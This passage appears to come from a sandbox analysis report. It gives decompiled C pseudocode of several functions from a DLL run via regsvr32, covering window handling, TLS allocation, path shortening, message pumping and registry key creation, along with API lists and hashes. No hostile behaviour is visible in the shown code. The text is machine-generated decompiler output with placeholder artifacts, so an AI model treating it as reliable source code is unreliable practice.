							E1002CE2A(_t109);
							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
						_push( *((intOrPtr*)(_t143 - 0x6c)));
						_push( *(_t143 - 0x70));
						_push(0);
					}
					E100204FE(_t140);
					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
						E1000870E(_t140, _t109);
					}
					_t120 =  *((intOrPtr*)(_t140 + 0x88));
					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
						E1002D1B2(_t120, _t140, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
			}

















                                                                        0x1002da8d
                                                                        0x1002da8e
                                                                        0x1002da9b
                                                                        0x1002daa2
                                                                        0x1002daa8
                                                                        0x1002dab6
                                                                        0x1002dab8
                                                                        0x1002dac4
                                                                        0x1002daf2
                                                                        0x1002dafd
                                                                        0x1002dafd
                                                                        0x1002db01
                                                                        0x1002db0e
                                                                        0x1002db12
                                                                        0x1002db15
                                                                        0x1002db17
                                                                        0x1002db1f
                                                                        0x1002db22
                                                                        0x1002db2e
                                                                        0x1002db2e
                                                                        0x1002db41
                                                                        0x1002db4d
                                                                        0x1002db54
                                                                        0x1002db4f
                                                                        0x1002db4f
                                                                        0x1002db4f
                                                                        0x1002db5a
                                                                        0x1002db5f
                                                                        0x1002db75
                                                                        0x1002db79
                                                                        0x1002db87
                                                                        0x1002db87
                                                                        0x1002db90
                                                                        0x1002dc11
                                                                        0x1002dc13
                                                                        0x1002dc1f
                                                                        0x1002dc2b
                                                                        0x1002dc2b
                                                                        0x1002dc30
                                                                        0x1002dc36
                                                                        0x1002dc3d
                                                                        0x1002dc3e
                                                                        0x1002dc41
                                                                        0x1002dc42
                                                                        0x1002dc4a
                                                                        0x1002dc4b
                                                                        0x1002db92
                                                                        0x1002db9c
                                                                        0x1002dba8
                                                                        0x1002dbb0
                                                                        0x1002dbbb
                                                                        0x1002dbcb
                                                                        0x1002dbd3
                                                                        0x1002dbd4
                                                                        0x1002dbda
                                                                        0x1002dbe0
                                                                        0x1002dbe1
                                                                        0x1002dbe2
                                                                        0x1002dbe5
                                                                        0x1002dbe6
                                                                        0x1002dbeb
                                                                        0x1002dbeb
                                                                        0x1002dbf7
                                                                        0x1002dbfc
                                                                        0x1002dc03
                                                                        0x1002dc04
                                                                        0x1002dc07
                                                                        0x1002dc0a
                                                                        0x1002dc0a
                                                                        0x1002dc4e
                                                                        0x1002dc64
                                                                        0x1002dc69
                                                                        0x1002dc69
                                                                        0x1002dc6e
                                                                        0x1002dc76
                                                                        0x1002dc7d
                                                                        0x1002dc7d
                                                                        0x1002dc84
                                                                        0x1002dc8f
                                                                        0x1002dc8f
                                                                        0x1002dcab

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$CopyCtrlEqualParentWindow
                                                                        • String ID: @
                                                                        • API String ID: 2544134605-2766056989
                                                                        • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                        • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037732 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x1004f010
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E1003741E(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10037684(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x2f10950
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001CE3B(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}












                                                                        0x10037735
                                                                        0x10037739
                                                                        0x1003773b
                                                                        0x1003773b
                                                                        0x1003773f
                                                                        0x10037742
                                                                        0x10037748
                                                                        0x1003774f
                                                                        0x1003782b
                                                                        0x1003782c
                                                                        0x10037755
                                                                        0x10037755
                                                                        0x10037758
                                                                        0x00000000
                                                                        0x1003775e
                                                                        0x10037766
                                                                        0x1003776a
                                                                        0x1003778c
                                                                        0x10037799
                                                                        0x1003778e
                                                                        0x10037795
                                                                        0x10037795
                                                                        0x1003779b
                                                                        0x1003779e
                                                                        0x100377a1
                                                                        0x100377a1
                                                                        0x100377a4
                                                                        0x100377a7
                                                                        0x100377aa
                                                                        0x00000000
                                                                        0x1003776c
                                                                        0x1003776c
                                                                        0x10037772
                                                                        0x100377ad
                                                                        0x100377ad
                                                                        0x100377b2
                                                                        0x100377c4
                                                                        0x100377c9
                                                                        0x100377ce
                                                                        0x100377b4
                                                                        0x100377b4
                                                                        0x100377bc
                                                                        0x100377bc
                                                                        0x100377d6
                                                                        0x100377db
                                                                        0x100377e1
                                                                        0x100377e1
                                                                        0x100377e9
                                                                        0x100377ec
                                                                        0x100377fa
                                                                        0x100377ff
                                                                        0x10037806
                                                                        0x1003780b
                                                                        0x10037811
                                                                        0x10037811
                                                                        0x10037772
                                                                        0x10037814
                                                                        0x10037819
                                                                        0x10037823
                                                                        0x10037823
                                                                        0x1003782c
                                                                        0x1003782c
                                                                        0x10037758
                                                                        0x10037836

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                        • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                        • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                        • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                        • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                        • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                        • String ID:
                                                                        • API String ID: 784703316-0
                                                                        • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                        • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000F6EA Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E1000F6EA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E100203CE(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000F6EA(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}












                                                                        0x1000f6ea
                                                                        0x1000f6ea
                                                                        0x1000f6ec
                                                                        0x1000f6f3
                                                                        0x1000f793
                                                                        0x1000f797
                                                                        0x1000f7a6
                                                                        0x1000f7aa
                                                                        0x1000f755
                                                                        0x1000f765
                                                                        0x1000f7bc
                                                                        0x00000000
                                                                        0x1000f7bc
                                                                        0x1000f767
                                                                        0x1000f768
                                                                        0x1000f76f
                                                                        0x1000f781
                                                                        0x1000f7b0
                                                                        0x1000f7b0
                                                                        0x1000f7b1
                                                                        0x1000f7b3
                                                                        0x00000000
                                                                        0x1000f7b3
                                                                        0x1000f783
                                                                        0x1000f78c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f78e
                                                                        0x1000f78e
                                                                        0x1000f78e
                                                                        0x1000f78f
                                                                        0x1000f790
                                                                        0x1000f7b4
                                                                        0x1000f7b9
                                                                        0x00000000
                                                                        0x1000f7bb
                                                                        0x1000f76f
                                                                        0x00000000
                                                                        0x1000f7ac
                                                                        0x1000f708
                                                                        0x1000f70d
                                                                        0x1000f741
                                                                        0x1000f729
                                                                        0x1000f72d
                                                                        0x00000000
                                                                        0x1000f733
                                                                        0x1000f73c
                                                                        0x00000000
                                                                        0x1000f73c
                                                                        0x1000f72d
                                                                        0x1000f753
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentVisible
                                                                        • String ID:
                                                                        • API String ID: 506644340-0
                                                                        • Opcode ID: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                        • Opcode Fuzzy Hash: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024AA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t21;
				CHAR* _t22;
				int _t31;
				CHAR* _t33;
				intOrPtr _t35;
				CHAR* _t40;
				void* _t44;
				void* _t47;

				_t40 = _a4;
				_t31 = lstrlenA(_t40);
				_t21 = E10038481(_t40, 0, 0) - 1;
				_t44 = _t31 - _t21;
				_t35 = _t44 + _t40;
				_a4 = _t21;
				_v8 = _t35;
				if(_a8 < _t31) {
					if(_a8 >= _t21) {
						_t33 =  &(_t40[2]);
						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
							while( *_t33 != 0x5c) {
								_t33 = E100127D1(_t33);
							}
						}
						if(_t44 > 3) {
							do {
								_t33 = E100127D1(_t33);
							} while ( *_t33 != 0x5c);
						}
						_t22 = _a4;
						_t47 = _t33 - _t40;
						_t12 =  &(_t22[5]); // 0x5
						if(_a8 >= _t47 + _t12) {
							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
								do {
									_t33 = E100127D1(_t33);
								} while ( *_t33 != 0x5c);
							}
							 *((char*)(_t47 + _t40)) = 0;
							lstrcatA(_t40, "\\...");
							_t21 = lstrcatA(_t40, _t33);
						} else {
							_push(_v8);
							goto L14;
						}
					} else {
						if(_a12 == 0) {
							_t35 = 0x1003da51;
						}
						_push(_t35);
						L14:
						_t21 = lstrcpyA(_t40, ??);
					}
				}
				return _t21;
			}












                                                                        0x10024aa8
                                                                        0x10024ab7
                                                                        0x10024abe
                                                                        0x10024ac1
                                                                        0x10024ac6
                                                                        0x10024ac9
                                                                        0x10024acc
                                                                        0x10024acf
                                                                        0x10024ad8
                                                                        0x10024aeb
                                                                        0x10024aee
                                                                        0x10024b01
                                                                        0x10024aff
                                                                        0x10024aff
                                                                        0x10024b01
                                                                        0x10024b09
                                                                        0x10024b0b
                                                                        0x10024b11
                                                                        0x10024b16
                                                                        0x10024b0b
                                                                        0x10024b19
                                                                        0x10024b1e
                                                                        0x10024b20
                                                                        0x10024b27
                                                                        0x10024b43
                                                                        0x10024b35
                                                                        0x10024b3b
                                                                        0x10024b40
                                                                        0x10024b35
                                                                        0x10024b58
                                                                        0x10024b63
                                                                        0x10024b67
                                                                        0x10024b29
                                                                        0x10024b29
                                                                        0x00000000
                                                                        0x10024b29
                                                                        0x10024ada
                                                                        0x10024ade
                                                                        0x10024ae0
                                                                        0x10024ae0
                                                                        0x10024ae5
                                                                        0x10024b2c
                                                                        0x10024b2d
                                                                        0x10024b2d
                                                                        0x10024ad8
                                                                        0x10024b6d

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                          • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                        • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                        • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                        • String ID: \...
                                                                        • API String ID: 1604900594-1167917071
                                                                        • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                        • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100304C6 Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E100304C6(void* __ecx) {
				struct tagMSG _v28;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					if(_t21 != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E100220EE(_t40, GetDesktopWindow());
				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
				_t33 = E10029068();
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}











                                                                        0x100304d5
                                                                        0x100304d8
                                                                        0x100304da
                                                                        0x100304ff
                                                                        0x100304e5
                                                                        0x100304ed
                                                                        0x100304f8
                                                                        0x100304fe
                                                                        0x00000000
                                                                        0x100304fe
                                                                        0x10030581
                                                                        0x10030581
                                                                        0x1003050d
                                                                        0x10030516
                                                                        0x10030521
                                                                        0x10030528
                                                                        0x1003052e
                                                                        0x10030531
                                                                        0x10030534
                                                                        0x10030537
                                                                        0x1003053a
                                                                        0x1003054c
                                                                        0x10030559
                                                                        0x10030562
                                                                        0x1003055b
                                                                        0x1003055b
                                                                        0x1003055b
                                                                        0x1003056e
                                                                        0x1003056f
                                                                        0x10030574
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                        • String ID:
                                                                        • API String ID: 1192691108-0
                                                                        • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                        • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100358C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100358C8(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                        0x100358e3
                                                                        0x100358ea
                                                                        0x100358ed
                                                                        0x100358f0
                                                                        0x100358f3
                                                                        0x100358fe
                                                                        0x10035935
                                                                        0x10035935
                                                                        0x10035940
                                                                        0x10035945
                                                                        0x10035945
                                                                        0x1003594a
                                                                        0x1003594f
                                                                        0x1003594f
                                                                        0x10035958

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                        • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate$Open
                                                                        • String ID: software
                                                                        • API String ID: 1740278721-2010147023
                                                                        • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                        • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10007B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E1000799F() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1004ee08(_a4, _a8);
			}







                                                                        0x10007b5d
                                                                        0x10007b76
                                                                        0x10007bdd
                                                                        0x10007bdd
                                                                        0x10007bdf
                                                                        0x00000000
                                                                        0x10007be0
                                                                        0x10007b78
                                                                        0x10007b7f
                                                                        0x00000000
                                                                        0x10007b98
                                                                        0x10007b99
                                                                        0x10007b9c
                                                                        0x10007baa
                                                                        0x10007bad
                                                                        0x10007bb5
                                                                        0x10007bb6
                                                                        0x10007bb7
                                                                        0x10007bb8
                                                                        0x10007bbf
                                                                        0x10007bc2
                                                                        0x10007bc6
                                                                        0x10007bd3
                                                                        0x10007bd3
                                                                        0x10007bd9
                                                                        0x00000000
                                                                        0x10007bd9
                                                                        0x10007b7f
                                                                        0x00000000

                                                                        APIs
